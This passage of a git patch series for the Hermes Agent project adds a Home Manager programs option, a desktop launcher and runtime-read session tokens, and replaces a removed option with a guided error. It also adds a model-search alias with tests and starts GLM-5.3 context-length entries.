and no message. The module must refuse the configuration and name + # the replacement. + home-manager-install-package-removed = + let + common = import ./moduleCommon.nix { inherit lib; }; + + # `builtins.length` is enough to force the assertion, because + # Home Manager wraps the whole `config` in its assertion check. + # `lib.deepSeq` would walk each package of the closure instead, + # and overflow the stack before it reached an answer. + refuses = + value: + !(builtins.tryEval ( + builtins.length + (evalHomeSplit { + services = { + enable = true; + installPackage = value; + }; + }).config.home.packages + )).success; + + # The check calls the same function the module calls, so it reads + # the real message. Matching the source text of the module instead + # would pass while the message was wrong. + messageFor = common.installPackageRemovedMessage; + + cases = [ + { + value = true; + expect = "programs.hermes-agent.enable = true;"; + } + { + value = false; + expect = "programs.hermes-agent.enable = false;"; + } + ]; + + failures = + lib.concatMap ( + case: + lib.optional ( + !refuses case.value + ) "installPackage = ${lib.boolToString case.value} must be refused" + ++ lib.optional ( + !lib.hasInfix case.expect (messageFor case.value) + ) "the message for installPackage = ${lib.boolToString case.value} must name `${case.expect}`" + ++ lib.optional ( + !lib.hasInfix "installPackage was removed" (messageFor case.value) + ) "the message must say that the option was removed" + ) cases + ++ lib.optional ( + # A configuration that never names the option must still work. + # An assertion that fires on the default value would break each + # existing user at once. + refuses null + ) "a configuration that never names installPackage must evaluate"; + in + pkgs.runCommand "hermes-home-manager-install-package-removed" { } ( + if failures != [ ] then + throw "installPackage removal check failed:\n${lib.concatMapStringsSep "\n" (f: " - ${f}") failures}" + else + '' + echo "PASS: installPackage is refused with guidance, and its absence evaluates" + mkdir -p $out + echo "ok" > $out/result + '' + ); + # ── The two modules keep the same options ──────────────────────── # The modules share one option set, in nix/moduleCommon.nix. Thus a # NixOS example works on Home Manager without a change. This check @@ -629,6 +901,10 @@ json.dump(sorted(leaf_paths(DEFAULT_CONFIG)), sys.stdout, indent=2) waitFor = null; interfaceName = null; waitTimeout = 120; + # No token here: this case asserts the plain argv, which the + # module builds only when nothing must run before the + # backend. A token needs the launcher script instead. + sessionTokenFile = null; }; }; sentinel = "--hermes-nix-argv-probe"; diff --git a/nix/desktop.nix b/nix/desktop.nix index fa76993d27..7f7bcfdb0e 100644 --- a/nix/desktop.nix +++ b/nix/desktop.nix @@ -15,9 +15,30 @@ electron, hermesAgent, python3, + # Environment to bake into the launcher. A GUI launcher reads none of the + # shell profile, so a variable that an interactive shell exports does not + # reach an app that the desktop menu starts. The Home Manager module passes + # HERMES_HOME and HERMES_MANAGED here, which gives the app the same state + # directory as the services. + extraEnv ? { }, + # Shell lines to run before the app starts. A secret belongs here and never + # in extraEnv: makeWrapper writes a --set value into the Nix store, which + # all users can read. A --run line reads the value from a runtime path at + # each start instead. + extraRun ? [ ], ... }: let + # Each flag goes on its own continued line, and the leading backslash is + # inside the generated string. An empty attribute set then adds no text at + # all, and cannot leave a backslash above a blank line. That fault ends the + # makeWrapper command early, and the next flag runs as a shell command. + extraEnvFlags = lib.concatMapStrings ( + name: " \\\n --set ${name} ${lib.escapeShellArg (toString extraEnv.${name})}" + ) (lib.attrNames extraEnv); + + extraRunFlags = lib.concatMapStrings (line: " \\\n --run ${lib.escapeShellArg line}") extraRun; + electronHeaders = pkgs.fetchurl { url = "https://artifacts.electronjs.org/headers/dist/v${electron.version}/node-v${electron.version}-headers.tar.gz"; sha256 = "sha256-f8bSbLRmtbP93CJAvEBs+sHWDZ1xP2bcpLhC1EnOmZU="; @@ -168,7 +189,7 @@ stdenv.mkDerivation { makeWrapper ${lib.getExe electron} $out/bin/hermes-desktop \ --add-flags "$out/share/hermes-desktop" \ --set HERMES_DESKTOP_HERMES "${lib.getExe hermesAgent}" \ - --set ELECTRON_IS_DEV 0 + --set ELECTRON_IS_DEV 0${extraEnvFlags}${extraRunFlags} # XDG launcher entry mkdir -p $out/share/applications $out/share/icons/hicolor/1024x1024/apps diff --git a/nix/homeManagerModules.nix b/nix/homeManagerModules.nix index efaf9d7af4..cbffaffce7 100644 --- a/nix/homeManagerModules.nix +++ b/nix/homeManagerModules.nix @@ -17,12 +17,19 @@ # changed systemd.services -> systemd.user.services or # launchd.agents # changed system.activationScripts -> home.activation -# changed addToSystemPackages -> installPackage and +# changed addToSystemPackages -> programs.hermes-agent.enable and # home.sessionVariables +# added programs.hermes-agent the CLI and the desktop application, +# because Home Manager separates an +# installation from a daemon # changed stateDir (+ "/.hermes") -> hermesHome, set directly # # To use the module: # imports = [ hermes-agent.homeManagerModules.default ]; +# programs.hermes-agent = { +# enable = true; # the hermes CLI on your PATH +# desktop.enable = true; # the Electron application and a launcher +# }; # services.hermes-agent = { # enable = true; # gateway.enable = true; @@ -48,6 +55,7 @@ let cfg = config.services.hermes-agent; + cfgPrograms = config.programs.hermes-agent; common = import ./moduleCommon.nix { inherit lib; }; effectivePackage = common.effectivePackage cfg; @@ -63,6 +71,52 @@ }; unitPath = lib.makeBinPath (common.processPath { inherit pkgs cfg; }); + # ── The desktop launcher ─────────────────────────────────────────── + # A GUI launcher reads no shell profile, so home.sessionVariables does + # not reach it, and the application would open ~/.hermes while the + # services use hermesHome. Thus the launcher carries the value itself. + # + # HERMES_MANAGED rides along only when the services are enabled. That + # variable makes the CLI refuse a configuration change and name the + # rebuild command. A person who enables `programs.` alone has no + # activation and no managed configuration, so the application must not + # claim one and refuse an edit that nothing else owns. + desktopEnvironment = { + HERMES_HOME = cfg.hermesHome; + } + // lib.optionalAttrs cfg.enable { + inherit (processEnvironment) HERMES_MANAGED; + } + // lib.optionalAttrs desktopUsesService { + HERMES_DESKTOP_REMOTE_URL = "http://${cfg.backend.host}:${toString cfg.backend.port}"; + }; + + # The application reaches the backend of the service only when there is + # a backend to reach AND a shared token to present with. Without the + # token the desktop resolver throws ("HERMES_DESKTOP_REMOTE_URL is set + # but HERMES_DESKTOP_REMOTE_TOKEN is not"), so the two variables travel + # together or not at all. + desktopUsesService = cfg.enable && cfg.backend.mode != "none" && cfg.backend.sessionTokenFile != null; + + # The token is read at start time and never with `--set`. makeWrapper + # writes a --set value into the Nix store, which all users can read. + desktopRun = lib.optional desktopUsesService '' + if [ -r ${lib.escapeShellArg cfg.backend.sessionTokenFile} ]; then + HERMES_DESKTOP_REMOTE_TOKEN="$(tr -d '\r\n' < ${lib.escapeShellArg cfg.backend.sessionTokenFile})" + export HERMES_DESKTOP_REMOTE_TOKEN + else + echo "hermes-desktop: cannot read the session token at ${cfg.backend.sessionTokenFile}." >&2 + echo "hermes-desktop: the application starts its own backend instead of the one of the service." >&2 + fi + ''; + + # `override`, and not `overrideAttrs`: the values go into the wrapper + # that the installPhase writes, and not into a derivation attribute. + desktopPackage = cfgPrograms.desktop.package.override { + extraEnv = desktopEnvironment; + extraRun = desktopRun; + }; + # The systemd unit that the gateway and the backend both start from. mkUnit = { @@ -124,6 +178,73 @@ in { + # ── programs.hermes-agent — the installation ─────────────────────── + # Home Manager separates "install this application for me" from "run + # this daemon". Hermes needs both, and a person can want one without + # the other: an application with no gateway, or a headless gateway on + # a machine with no display. + # + # `services.hermes-agent` stays the authority for the state and the + # configuration. This module reads hermesHome and the backend address + # from it, and never the reverse. + options.programs.hermes-agent = { + enable = lib.mkEnableOption '' + the Hermes Agent command line application. + + This adds `hermes` to home.packages, and exports HERMES_HOME with + home.sessionVariables. An interactive shell then uses the same + state as `services.hermes-agent` + ''; + + package = lib.mkOption { + type = lib.types.package; + default = effectivePackage; + defaultText = lib.literalExpression "config.services.hermes-agent.package"; + description = '' + The hermes-agent package to install. + + The default follows `services.hermes-agent.package`, and applies + `extraPythonPackages` and `extraDependencyGroups` from that + module. Thus the command line and the services are one build, + and a plugin that the services can load is a plugin that your + shell can load. + ''; + }; + + desktop = { + enable = lib.mkEnableOption '' + the Hermes Desktop application (Electron). + + This adds `hermes-desktop` to home.packages, with an XDG + launcher entry on Linux. The launcher starts the same Hermes + runtime that `package` gives, and reads the HERMES_HOME of + `services.hermes-agent`. Thus the application, the interactive + shell and the services share one state directory. + + The Electron application carries its own Hermes runtime with + the usual distribution. This module gives it the Nix package + instead, with HERMES_DESKTOP_HERMES. It installs no second copy + of Hermes, and it downloads nothing on the first start + ''; + + package = lib.mkOption { + type = lib.types.package; + default = cfgPrograms.package.hermesDesktop; + defaultText = lib.literalExpression "config.programs.hermes-agent.package.hermesDesktop"; + description = '' + The hermes-desktop package to use. + + The default follows `package`, and thus also + `services.hermes-agent.extraPythonPackages` and + `extraDependencyGroups`, because the desktop application is a + passthru of the agent package. A package that you set here + carries its own Hermes runtime, and this module cannot make + it agree with the services. + ''; + }; + }; + }; + options.services.hermes-agent = common.sharedOptions { defaultPackage = hermes-agent; @@ -149,125 +270,159 @@ example = "/home/alice/.hermes-work"; }; + # `installPackage` moved to `programs.hermes-agent.enable`. The + # option is dead, but it must not be silent: it defaulted to true, + # so a person who never named it still got the command line, and a + # quiet removal gives them a machine with no `hermes` and no + # message. mkOption with an assertion, and not + # mkRemovedOptionModule, because the message must name the exact + # replacement for the value they set. installPackage = lib.mkOption { - type = lib.types.bool; - default = true; + type = lib.types.nullOr lib.types.bool; + default = null; + visible = false; description = '' - Add the hermes CLI to home.packages, and export HERMES_HOME - with home.sessionVariables. Interactive shells then use the - same state as the services. - - The equivalent NixOS option, `addToSystemPackages`, exports - HERMES_HOME with environment.variables. That variable applies - to the full system and replaces the HERMES_HOME of each other - user. This module exports the variable for one user session - only, which is the reason to use Home Manager. + Removed. Use `programs.hermes-agent.enable` instead. ''; }; gateway.enable = lib.mkEnableOption "the messaging gateway service (Telegram, Discord, Slack, ...)"; }; - config = lib.mkIf cfg.enable ( - lib.mkMerge [ + config = lib.mkMerge [ - # ── Merge MCP servers into settings ──────────────────────────── - (lib.mkIf (cfg.mcpServers != { }) { - services.hermes-agent.settings.mcp_servers = common.mcpServersToConfig cfg.mcpServers; - }) + # ── programs.hermes-agent — the installation ────────────────────── + # Outside the `services.enable` guard on purpose. A person can want + # the command line or the application on a machine that runs no + # daemon at all. + (lib.mkIf cfgPrograms.enable { + home.packages = [ cfgPrograms.package ]; + home.sessionVariables.HERMES_HOME = cfg.hermesHome; + }) - { - assertions = - common.pluginNameAssertions { - inherit cfg; - optionPath = "services.hermes-agent"; - } - ++ common.workspaceFilesAssertions { - inherit cfg; - opt = options.services.hermes-agent.workingDirectory; - optionPath = "services.hermes-agent"; - } - ++ common.backendBindAssertions { - inherit cfg; - optionPath = "services.hermes-agent"; - } - ++ [ - { - # The interface poll reads `ip`, which iproute2 supplies on - # Linux only. - assertion = !isDarwin || cfg.backend.waitFor != "interface"; - message = "services.hermes-agent.backend.waitFor = \"interface\" works on Linux only. Use \"hostname\" on Darwin."; + # A launcher from the desktop menu reads no shell profile, so the + # HERMES_HOME that `programs.enable` exports does not reach it. Home + # Manager writes only systemd.user.sessionVariables into + # environment.d, and this module does not put HERMES_HOME there, + # because that file applies to each user unit. Thus the launcher + # carries the value itself. See desktopEnvironment above. + (lib.mkIf cfgPrograms.desktop.enable { + home.packages = [ desktopPackage ]; + }) + + { + assertions = [ + { + # `installPackage` was removed in favour of the programs/services + # split. It defaulted to true, so a quiet removal leaves a person + # with no `hermes` on the PATH and no message. + assertion = cfg.installPackage == null; + message = common.installPackageRemovedMessage cfg.installPackage; + } + ]; + } + + (lib.mkIf cfg.enable ( + lib.mkMerge [ + + # ── Merge MCP servers into settings ──────────────────────────── + (lib.mkIf (cfg.mcpServers != { }) { + services.hermes-agent.settings.mcp_servers = common.mcpServersToConfig cfg.mcpServers; + }) + + { + assertions = + common.pluginNameAssertions { + inherit cfg; + optionPath = "services.hermes-agent"; } - ]; - } - - # ── Packages and interactive-shell environment ───────────────── - (lib.mkIf cfg.installPackage { - home.packages = [ effectivePackage ] ++ cfg.extraPackages; - home.sessionVariables.HERMES_HOME = cfg.hermesHome; - }) - - # ── Activation: directories, config, secrets, documents ──────── - { - # The activation runs after writeBoundary, when the home.file - # symlinks are in place. It also runs after linkGeneration, when - # Home Manager completes the switch. A secret that the activation - # entry of sops-nix writes exists at that point. - home.activation.hermesAgentSetup = - lib.hm.dag.entryAfter - [ - "writeBoundary" - "linkGeneration" - ] - ( - common.mkStateScript { - inherit pkgs cfg; - inherit (cfg) hermesHome workingDirectory; - run = "$DRY_RUN_CMD "; - stateDirs = common.stateSubdirs; - managedSystem = "home-manager"; - # This state has one user. No group needs access to it. - modes = { - config = "0600"; - env = "0600"; - managed = "0600"; - auth = "0600"; - document = "0600"; - }; + ++ common.workspaceFilesAssertions { + inherit cfg; + opt = options.services.hermes-agent.workingDirectory; + optionPath = "services.hermes-agent"; + } + ++ common.backendBindAssertions { + inherit cfg; + optionPath = "services.hermes-agent"; + } + ++ [ + { + # The interface poll reads `ip`, which iproute2 supplies on + # Linux only. + assertion = !isDarwin || cfg.backend.waitFor != "interface"; + message = "services.hermes-agent.backend.waitFor = \"interface\" works on Linux only. Use \"hostname\" on Darwin."; } - ); - } + ]; + } - # ── Linux: systemd user services ─────────────────────────────── - (lib.mkIf (isLinux && cfg.gateway.enable) { - systemd.user.services.hermes-agent = mkUnit { - description = "Hermes Agent Gateway"; - argv = common.gatewayArgv cfg; - }; - }) + # The agent runs these tools, so they belong on the PATH of the + # person as well as in the unit. + (lib.mkIf cfgPrograms.enable { + home.packages = cfg.extraPackages; + }) - (lib.mkIf (isLinux && cfg.backend.mode != "none") { - systemd.user.services.hermes-backend = mkUnit { - description = common.backendDescription cfg; - argv = common.backendArgv { inherit pkgs cfg; }; - }; - }) + # ── Activation: directories, config, secrets, documents ──────── + { + # The activation runs after writeBoundary, when the home.file + # symlinks are in place. It also runs after linkGeneration, when + # Home Manager completes the switch. A secret that the activation + # entry of sops-nix writes exists at that point. + home.activation.hermesAgentSetup = + lib.hm.dag.entryAfter + [ + "writeBoundary" + "linkGeneration" + ] + ( + common.mkStateScript { + inherit pkgs cfg; + inherit (cfg) hermesHome workingDirectory; + run = "$DRY_RUN_CMD "; + stateDirs = common.stateSubdirs; + managedSystem = "home-manager"; + # This state has one user. No group needs access to it. + modes = { + config = "0600"; + env = "0600"; + managed = "0600"; + auth = "0600"; + document = "0600"; + }; + } + ); + } - # ── Darwin: launchd agents ───────────────────────────────────── - (lib.mkIf (isDarwin && cfg.gateway.enable) { - launchd.agents.hermes-agent = mkAgent { - argv = common.gatewayArgv cfg; - logName = "hermes-agent"; - }; - }) + # ── Linux: systemd user services ─────────────────────────────── + (lib.mkIf (isLinux && cfg.gateway.enable) { + systemd.user.services.hermes-agent = mkUnit { + description = "Hermes Agent Gateway"; + argv = common.gatewayArgv cfg; + }; + }) - (lib.mkIf (isDarwin && cfg.backend.mode != "none") { - launchd.agents.hermes-backend = mkAgent { - argv = common.backendArgv { inherit pkgs cfg; }; - logName = "hermes-backend"; - }; - }) - ] - ); + (lib.mkIf (isLinux && cfg.backend.mode != "none") { + systemd.user.services.hermes-backend = mkUnit { + description = common.backendDescription cfg; + argv = common.backendArgv { inherit pkgs cfg; }; + }; + }) + + # ── Darwin: launchd agents ───────────────────────────────────── + (lib.mkIf (isDarwin && cfg.gateway.enable) { + launchd.agents.hermes-agent = mkAgent { + argv = common.gatewayArgv cfg; + logName = "hermes-agent"; + }; + }) + + (lib.mkIf (isDarwin && cfg.backend.mode != "none") { + launchd.agents.hermes-backend = mkAgent { + argv = common.backendArgv { inherit pkgs cfg; }; + logName = "hermes-backend"; + }; + }) + ] + )) + ]; }; } diff --git a/nix/moduleCommon.nix b/nix/moduleCommon.nix index 5ea5b50e2c..cb0da9444a 100644 --- a/nix/moduleCommon.nix +++ b/nix/moduleCommon.nix @@ -10,7 +10,8 @@ # nixosModules.nix the service user and group, stateDir, # addToSystemPackages, container mode, tmpfiles, # system.activationScripts, system systemd units -# homeManagerModules.nix hermesHome, installPackage, home.activation, +# homeManagerModules.nix hermesHome, programs.hermes-agent (the CLI and +# the desktop application), home.activation, # systemd.user.services, launchd.agents # # The split is by scope, not by feature. Code that needs root or a system @@ -618,9 +619,59 @@ let default = [ ]; description = "More command-line arguments for the backend command."; }; + + sessionTokenFile = mkOption { + # The type is `str` and not `path` for the same reason that + # environmentFiles uses `str`. A Nix path literal copies the secret + # into the Nix store, which all users can read. Use a runtime path + # from sops-nix or agenix instead. + type = types.nullOr types.str; + default = null; + description = '' + The path to a file that holds the session token of the backend, + on one line. + + The backend reads the file at each start and gives the value to + HERMES_DASHBOARD_SESSION_TOKEN. That token authorizes the /api + routes and the /api/ws socket. Hermes Desktop presents the same + value, so the application reaches this backend and starts no + second one. + + Without this option the backend makes a new token at each start, + which no other process can know. + + CAUTION: The file must hold the raw token and nothing else. Give + it mode 0600. Do not use a Nix path literal, because that copies + the secret into the Nix store. + ''; + example = literalExpression ''config.sops.secrets."hermes/desktop-token".path''; + }; }; }; + # ── The removal of installPackage ─────────────────────────────────────── + # The programs./services. split replaced this option. It defaulted to true, + # so a person who never named it still got the command line, and a silent + # removal leaves them with no `hermes` on the PATH and no message. The + # module refuses the configuration with this text. + # + # A function, and not a literal in the module, so a check can call the same + # code and read the real message. A check that matched the source text of + # the module would pass while the message was wrong. + installPackageRemovedMessage = + value: + '' + services.hermes-agent.installPackage was removed. Hermes now + separates the installation from the services, which is the + Home Manager convention: + + programs.hermes-agent.enable = ${lib.boolToString (value != false)}; # the hermes CLI, and HERMES_HOME for your shells + programs.hermes-agent.desktop.enable = true; # the desktop application + + `services.hermes-agent` keeps the state, the configuration and + the daemons. Remove `installPackage` and add the line above. + ''; + # ── Package resolution ────────────────────────────────────────────────── effectivePackage = cfg: @@ -862,7 +913,14 @@ let ] ++ cfg.backend.extraArgs; - # The launcher that waits for the bind target, then starts the backend. + # The launcher that reads the session token, waits for the bind target, + # then starts the backend. + # + # The token cannot go in the unit environment. A systemd `Environment=` + # value and a launchd EnvironmentVariables value both land in the Nix + # store, which all users can read. Thus the launcher reads the file at + # start time. launchd has no EnvironmentFile, so a script is the one shape + # that works on both hosts. # # `exec` on the last line keeps hermes as the MainPID of the unit. No shell # stays in the cgroup, and the restart logic of systemd sees the real @@ -879,8 +937,32 @@ let _timeout=${toString cfg.backend.waitTimeout} _waited=0 + ${lib.optionalString (cfg.backend.sessionTokenFile != null) '' + # Read the token, and never put it on a command line. A command + # line is visible to each process on the host. + _token_file=${lib.escapeShellArg cfg.backend.sessionTokenFile} + + if [ ! -r "$_token_file" ]; then + echo "hermes-backend: cannot read the session token file '$_token_file'. The unit stops." >&2 + echo "hermes-backend: backend.sessionTokenFile must name a runtime path that this user can read." >&2 + exit 1 + fi + + HERMES_DASHBOARD_SESSION_TOKEN="$(${pkgs.coreutils}/bin/tr -d '\r\n' < "$_token_file")" + export HERMES_DASHBOARD_SESSION_TOKEN + + if [ -z "$HERMES_DASHBOARD_SESSION_TOKEN" ]; then + echo "hermes-backend: the session token file '$_token_file' is empty. The unit stops." >&2 + exit 1 + fi + ''} ${ - if cfg.backend.waitFor == "hostname" then + if cfg.backend.waitFor == null then + '' + _target=${lib.escapeShellArg cfg.backend.host} + _how="the configured address" + '' + else if cfg.backend.waitFor == "hostname" then '' _target=${lib.escapeShellArg cfg.backend.host} _how="hostname" @@ -940,7 +1022,10 @@ let backendArgv = { pkgs, cfg }: - if cfg.backend.waitFor == null then + # A plain argv is enough only when nothing must run before the backend. + # A wait needs the address at start time, and a token must be read from + # a file that the store must never hold. Either one needs the launcher. + if cfg.backend.waitFor == null && cfg.backend.sessionTokenFile == null then backendCommand cfg cfg.backend.host else [ "${backendLauncher { inherit pkgs cfg; }}" ]; @@ -1063,6 +1148,7 @@ in deepConfigType effectivePackage gatewayArgv + installPackageRemovedMessage mcpServerType mcpServersToConfig mkConfigFiles diff --git a/website/docs/getting-started/nix-setup.md b/website/docs/getting-started/nix-setup.md index a663721a91..3041696e5d 100644 --- a/website/docs/getting-started/nix-setup.md +++ b/website/docs/getting-started/nix-setup.md @@ -600,7 +600,8 @@ The option set is the same set that the NixOS module uses. It is `services.herme | Runs as | a system user that you declare, with `user`, `group` and `createUser` | you | | State directory | `stateDir` and `/.hermes` | `hermesHome`, set directly. The default is `~/.hermes`. | | Service | `systemd.services` | `systemd.user.services` on Linux, `launchd.agents` on macOS | -| CLI on the PATH | `addToSystemPackages`, which exports `HERMES_HOME` for the full system | `installPackage`, which exports it for your session only | +| CLI on the PATH | `addToSystemPackages`, which exports `HERMES_HOME` for the full system | `programs.hermes-agent.enable`, which exports it for your session only | +| Desktop application | not supported, because a system service cannot own a user session | `programs.hermes-agent.desktop.enable` | | Container mode | supported | not supported, because it needs root and the Docker socket | ### Add the Flake Input @@ -1031,9 +1032,50 @@ This option runs the process that Hermes Desktop and the web dashboard connect t | Option | Type | Default | Description | |---|---|---|---| | `hermesHome` | `str` | `"${config.home.homeDirectory}/.hermes"` | `HERMES_HOME` directly. The NixOS module builds it from `stateDir`. | -| `installPackage` | `bool` | `true` | Add the `hermes` CLI to `home.packages`, and export `HERMES_HOME` for your shells | | `gateway.enable` | `bool` | `false` | Run the messaging gateway. On the NixOS module the gateway is the service, so that module has no such option. | +### `programs.hermes-agent` (Home Manager only) + +Home Manager separates "install this application for me" from "run this +daemon". `services.hermes-agent` keeps the state, the configuration and the +daemons. `programs.hermes-agent` installs what you use, and reads +`hermesHome` and the backend address from the services. + +| Option | Type | Default | Description | +|---|---|---|---| +| `enable` | `bool` | `false` | Add the `hermes` CLI to `home.packages`, and export `HERMES_HOME` for your shells | +| `package` | `package` | `services.hermes-agent.package` | The package to install. The default applies `extraPythonPackages` and `extraDependencyGroups` from the services, so both are one build. | +| `desktop.enable` | `bool` | `false` | Add the Hermes Desktop application, with a launcher entry on Linux | +| `desktop.package` | `package` | `package.hermesDesktop` | The desktop package. The default follows `package`, so the application and the services run one Hermes runtime. | + +```nix +programs.hermes-agent = { + enable = true; + desktop.enable = true; +}; + +services.hermes-agent = { + enable = true; + backend.mode = "serve"; + backend.sessionTokenFile = config.sops.secrets."hermes/desktop-token".path; +}; +``` + +The launcher carries `HERMES_HOME` itself. A desktop menu reads no shell +profile, so the value that `programs.hermes-agent.enable` exports with +`home.sessionVariables` reaches an interactive shell only. Without the +value in the launcher, the application opens `~/.hermes` while the +services use `hermesHome`, and you see no sessions and no keys. + +With `backend.sessionTokenFile`, the application connects to the backend +of the service instead of starting one of its own. Both sides read the +file at start time, so the token enters no Nix store path. Without the +option, each side runs its own backend. + +`services.hermes-agent.installPackage` was removed by this split. A +configuration that still sets it gets an error that names the +replacement. + ### Container (NixOS only) | Option | Type | Default | Description | From 1bf8bd2c7d2057de4fdf80236b0b017f7d7097e4 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 13:20:37 -0700 Subject: [PATCH 042/161] feat(models): 'ox alpha' now finds x-preview-f-free in every model picker MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The OpenCode Zen wire slug for the Ox Alpha stealth model is opaque (x-preview-f-free); users searching the picker for 'ox' or 'ox-alpha' found nothing. Adds the search alias across all four synced alias tables (CLI, desktop, web, TUI) plus tests. Wire id is unchanged and still what renders and gets sent to the provider, matching the k3 → kimi-k3 precedent. No canonical-dedup collision with opencode-go's keyed ox-alpha-free slug. --- apps/desktop/src/lib/model-search-text.ts | 5 ++++- hermes_cli/model_search.py | 3 +++ tests/hermes_cli/test_model_search.py | 14 ++++++++++++++ ui-tui/src/lib/model-search-text.test.ts | 13 +++++++++++++ ui-tui/src/lib/model-search-text.ts | 5 ++++- web/src/lib/model-search-text.ts | 3 +++ 6 files changed, 41 insertions(+), 2 deletions(-) diff --git a/apps/desktop/src/lib/model-search-text.ts b/apps/desktop/src/lib/model-search-text.ts index 5cbe59d3ec..2717e7aa3f 100644 --- a/apps/desktop/src/lib/model-search-text.ts +++ b/apps/desktop/src/lib/model-search-text.ts @@ -9,7 +9,10 @@ * web/src/lib/model-search-text.ts, and hermes_cli/model_search.py. */ const MODEL_SEARCH_ALIASES: Record = { - k3: ['kimi-k3', 'kimi'] + k3: ['kimi-k3', 'kimi'], + // OpenCode Zen serves the "Ox Alpha" stealth model under an opaque + // preview slug; let users find it by its public codename. + 'x-preview-f-free': ['ox-alpha', 'ox'] } /** Haystack for fuzzy/substring model search; never changes the wire id. */ diff --git a/hermes_cli/model_search.py b/hermes_cli/model_search.py index 7004324604..23d3bae14b 100644 --- a/hermes_cli/model_search.py +++ b/hermes_cli/model_search.py @@ -13,6 +13,9 @@ from __future__ import annotations # Lowercased wire id → extra tokens appended to the search haystack only. _MODEL_SEARCH_ALIASES: dict[str, tuple[str, ...]] = { "k3": ("kimi-k3", "kimi"), + # OpenCode Zen serves the "Ox Alpha" stealth model under an opaque + # preview slug; let users find it by its public codename. + "x-preview-f-free": ("ox-alpha", "ox"), } # Lowercased wire id → canonical public slug it aliases. Used by picker diff --git a/tests/hermes_cli/test_model_search.py b/tests/hermes_cli/test_model_search.py index c6c5053584..a430608603 100644 --- a/tests/hermes_cli/test_model_search.py +++ b/tests/hermes_cli/test_model_search.py @@ -16,3 +16,17 @@ def test_filter_indices_surfaces_k3_for_kimi_query(): assert "k3" in ranked +def test_model_search_text_adds_ox_alpha_aliases(): + assert model_search_text("x-preview-f-free") == "x-preview-f-free ox-alpha ox" + assert model_search_text("X-Preview-F-Free") == "X-Preview-F-Free ox-alpha ox" + + +def test_filter_indices_surfaces_ox_alpha_preview_slug(): + models = ["x-preview-f-free", "gpt-5.6-sol", "kimi-k3"] + haystacks = [model_search_text(m) for m in models] + for query in ("ox", "ox-alpha"): + ranked = [models[i] for i in _filter_indices(haystacks, query)] + assert "x-preview-f-free" in ranked, query + + + diff --git a/ui-tui/src/lib/model-search-text.test.ts b/ui-tui/src/lib/model-search-text.test.ts index 5ef8e612c0..3440127323 100644 --- a/ui-tui/src/lib/model-search-text.test.ts +++ b/ui-tui/src/lib/model-search-text.test.ts @@ -13,6 +13,11 @@ describe('modelSearchText', () => { expect(modelSearchText('k3')).toBe('k3 kimi-k3 kimi') expect(modelSearchText('K3')).toBe('K3 kimi-k3 kimi') }) + + it('adds ox-alpha aliases for the Ox Alpha preview wire id', () => { + expect(modelSearchText('x-preview-f-free')).toBe('x-preview-f-free ox-alpha ox') + expect(modelSearchText('X-Preview-F-Free')).toBe('X-Preview-F-Free ox-alpha ox') + }) }) describe('model picker search with aliases', () => { @@ -32,4 +37,12 @@ describe('model picker search with aliases', () => { const ranked = fuzzyRank(models, 'glm', modelSearchText).map(r => r.item) expect(ranked).toEqual([]) }) + + it('surfaces the Ox Alpha preview slug when the user searches ox', () => { + const zenModels = ['x-preview-f-free', 'gpt-5.6-sol', 'kimi-k3'] + const ranked = fuzzyRank(zenModels, 'ox', modelSearchText).map(r => r.item) + expect(ranked).toContain('x-preview-f-free') + const rankedFull = fuzzyRank(zenModels, 'ox-alpha', modelSearchText).map(r => r.item) + expect(rankedFull).toContain('x-preview-f-free') + }) }) diff --git a/ui-tui/src/lib/model-search-text.ts b/ui-tui/src/lib/model-search-text.ts index bc7732ad69..487015e4ea 100644 --- a/ui-tui/src/lib/model-search-text.ts +++ b/ui-tui/src/lib/model-search-text.ts @@ -9,7 +9,10 @@ * hermes_cli/model_search.py. */ const MODEL_SEARCH_ALIASES: Record = { - k3: ['kimi-k3', 'kimi'] + k3: ['kimi-k3', 'kimi'], + // OpenCode Zen serves the "Ox Alpha" stealth model under an opaque + // preview slug; let users find it by its public codename. + 'x-preview-f-free': ['ox-alpha', 'ox'] } /** Haystack for fuzzy/substring model search; never changes the wire id. */ diff --git a/web/src/lib/model-search-text.ts b/web/src/lib/model-search-text.ts index 471d80c472..ab64c5c7c0 100644 --- a/web/src/lib/model-search-text.ts +++ b/web/src/lib/model-search-text.ts @@ -10,6 +10,9 @@ */ const MODEL_SEARCH_ALIASES: Record = { k3: ["kimi-k3", "kimi"], + // OpenCode Zen serves the "Ox Alpha" stealth model under an opaque + // preview slug; let users find it by its public codename. + "x-preview-f-free": ["ox-alpha", "ox"], }; /** Haystack for fuzzy/substring model search; never changes the wire id. */ From 01d8562fce28a77362e3e3ce7797f3aae57b1985 Mon Sep 17 00:00:00 2001 From: openclaw Date: Fri, 14 Aug 2026 09:26:02 -0400 Subject: [PATCH 043/161] =?UTF-8?q?fix(zai):=20add=20GLM-5.3=20support=20?= =?UTF-8?q?=E2=80=94=201M=20context=20window,=20model=20lists,=20reasoning?= =?UTF-8?q?=5Feffort?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit GLM-5.3 is live on api.z.ai (coding plan endpoint) but had no entries in Hermes, so it silently fell back to the generic 202K GLM context — triggering premature context compression on a 1M-window model. - model_metadata: 'glm-5.3': 1_048_576 (same base model as 5.2; 1M context / 128K max output per docs.z.ai/guides/llm/glm-5.3, verified 2026-08-14) - auth: add glm-5.3 to coding-plan probe lists (global + CN) - models: add glm-5.3 to picker/model lists (6 sites) - zai provider: reasoning_effort mapping covers glm-5.3 (accepted live by the endpoint, HTTP 200) --- agent/model_metadata.py | 15 +++++++++------ hermes_cli/auth.py | 4 ++-- hermes_cli/models.py | 7 ++++++- plugins/model-providers/zai/__init__.py | 20 +++++++++++++------- 4 files changed, 30 insertions(+), 16 deletions(-) diff --git a/agent/model_metadata.py b/agent/model_metadata.py index 3571a56469..bad065573a 100644 --- a/agent/model_metadata.py +++ b/agent/model_metadata.py @@ -501,16 +501,19 @@ DEFAULT_CONTEXT_LENGTHS = { # https://platform.minimax.io/docs/api-reference/text-chat-openai "minimax-m3": 1000000, "minimax": 204800, - # GLM — GLM-5.2 ships with a 1M context window (verified empirically: - # needle-in-a-haystack retrieval at 789K prompt tokens succeeded with - # zero errors on api.z.ai/api/coding/paas/v4). Older GLM models - # (5, 5.1, 5-turbo) are ~202K. Longest-key-first substring matching - # ensures "glm-5.2" resolves to 1M while older variants still 